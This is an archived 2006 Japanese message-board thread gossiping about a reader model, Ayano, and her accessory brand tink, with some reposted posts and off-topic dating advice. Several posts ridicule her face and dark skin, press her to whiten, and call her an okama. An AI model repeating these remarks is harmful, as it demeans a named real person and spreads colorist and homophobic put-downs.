顔以前に接客態度が最悪で大嫌いになった 店行って買ったのにありがとうございましたもなし。それどころか一切見向きもせず、くっちゃべってた。客は私ひとり。
自分デザインしたアクセ買ってもらえてる自覚なし。本業をちゃんとしろや!!

157 :無名モデル:2006/12/16(土) 13:15:23 ID:???
>>156
いや・・・接客態度をどう完璧にしようが
元の顔の造りがこうもひどいと叩かれるでしょう。

158 :無名モデル:2006/12/18(月) 02:52:27 ID:WtkDJ/aJ
ねぇ?素朴で純粋な疑問なんだけど、あれだけお金持ってて
「美」にもうるさいのに、お鼻を整形しないのはなぜ???

159 :無名モデル:2006/12/18(月) 11:22:06 ID:/DBbQo+5
いまさら整形したら叩かれるからジャマイカ???


160 :無名モデル:2006/12/18(月) 11:53:47 ID:phEsVk/t
鼻もだけど地黒がいけないんじゃない?
顔が黒いからIKKOに似てるっていわれるんだよ…あとタイのボクサー…
美白頑張れ!

161 :無名モデル:2006/12/18(月) 12:00:58 ID:DnaQyZYs
可愛くてイイとも!!

162 :無名モデル:2006/12/19(火) 02:19:00 ID:MiAiS7XN
おかまみたい

163 :無名モデル:2006/12/19(火) 05:14:15 ID:E9pcrfTw
EXILEのあつしに見えてしぁーない…あつしファン御免ねー!

164 :無名モデル:2006/12/19(火) 08:39:08 ID:bYJGGtT5
あー似てるね…
雰囲気がね。

165 :無名モデル:2006/12/19(火) 15:54:58 ID:???
本人はテコラッタ肌目指してま〜すとか言ってるけど
ほんっと即座にやめて無駄とわかってても美白に努めるよう
アドバイスしてやれ。
小さい目がより小さく、大きな鼻がより南国モードを増すから。

166 :無名モデル:2006/12/20(水) 15:18:05 ID:sZk2Yerq
黒たぬき顔!
よく芸能人と横になって写真取れるなって感じ。
でも、深きょんやSHIHOみたに美形ではない芸能人だから、ブスが目立たないけどさ。
あと、tinkinkっあと数年しか持ちそうもないよね〜初めからお金持ちだから、今の地位を築いているのを
自覚した方がいいよね。

167 :無名モデル:2006/12/21(木) 10:27:54 ID:???
167 :無名モデル :04/08/17 17:53 ID:???
伊勢丹行ったんでtinkの新作見てきました。
ホームページにもでてるリボンポーチは変だった。
パールにリボンつきのチョーカーは、ディアマンテに似てたけどディアマンテより高い1万超えで退いた。
ほかの新作はだいたいかわいかったよ。いくつか気になるのあったから明日またいきます。

168 :無名モデル:2006/12/21(木) 10:28:58 ID:u7rphTWZ
168 :無名モデル :04/08/17 19:34 ID:2ATKQ+bF
この人がでてると編集部に苦情の電話がすごいらしいですよ。

169 :無名モデル:2006/12/21(木) 10:30:03 ID:???
あすのビス またまたあやの でてくるよ

170 :無名モデル:2006/12/21(木) 10:31:26 ID:FbxbsDUG
ビス?廃刊では
あー、ブスか

171 :無名モデル:2006/12/21(木) 10:39:16 ID:Kj++zs73
171 :ノーブランドさん :04/06/21 10:39
白ノースリワンピにピンクカーデ、
白かピンクのミュールに薪薪ヘアーで
決まりだ!

172 :無名モデル:2006/12/21(木) 10:50:11 ID:???
米本さんと一緒にお買い物してたね
けばくて見る気しない

彩野載ってましたよ。
表紙に彩ちゃん返り咲き
なんか時代錯誤してるよね、この雑誌。

173 :無名モデル:2006/12/21(木) 12:31:55 ID:???
>>171
ピンクノースリワンピに白のカーデっていう逆パターンでも
いいかなぁ?それならもってる♪
狙った人にはどうやって近づけばよいでしょうか?
あんまり合コン経験ないんで・・・。
一人知ってる人がその中にいるんですけど(狙ってる)
すごいオトコっぽい人なんですよね。
どうやったら嫌われずにいけるかなぁ・・・??
教えてください。

174 :無名モデル:2006/12/21(木) 12:38:15 ID:u7rphTWZ
色は逆でも良し。
その人がちゃんと周りを見る人ならば、
まわりにさりげない気配りしてると好印象かな。
モチロン気になる人には、他の人よりちょっとだけより気を配る。
みんなの前であからさまに「狙ってます!」みたいな人は男でも引くよ。
んで解散時にアドなり電話番号なり渡して、後日2人で会えばイイんでない?

175 :無名モデル:2006/12/21(木) 12:51:22 ID:Gfc23jfF
もし私が客として156みたいな態度とられたらはっきり言ってしまうと思う。


「接 客 す る 気 あ る ん で す か ?」


まぁないと思うけどねw

176 :無名モデル:2006/12/21(木) 13:00:29 ID:???
気配りかぁ・・・。できるかなぁ〜。
アドはね、もう知ってるんですよ。
私と彼が幹事なので・・・。
看護学生なのですが、実習先で知り合ったのです。
(彼は救急救命士)
はぁ〜、緊張するなぁ・・・。
気を配るってのは、たとえば、どんなことすればいいんですかねぇ?

177 :無名モデル:2006/12/21(木) 13:06:05 ID:Kj++zs73
飲み屋で話を振りまくるとか。
「コレおいしいよ(はぁと)」とかやってみたり。

178 :無名モデル:2006/12/21(木) 13:18:06 ID:Kj++zs73
読モ続けてね!☆

179 :無名モデル:2006/12/21(木) 17:31:01 ID:2qoxlhBi
>172

bisなんて明日発売しないし

34 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)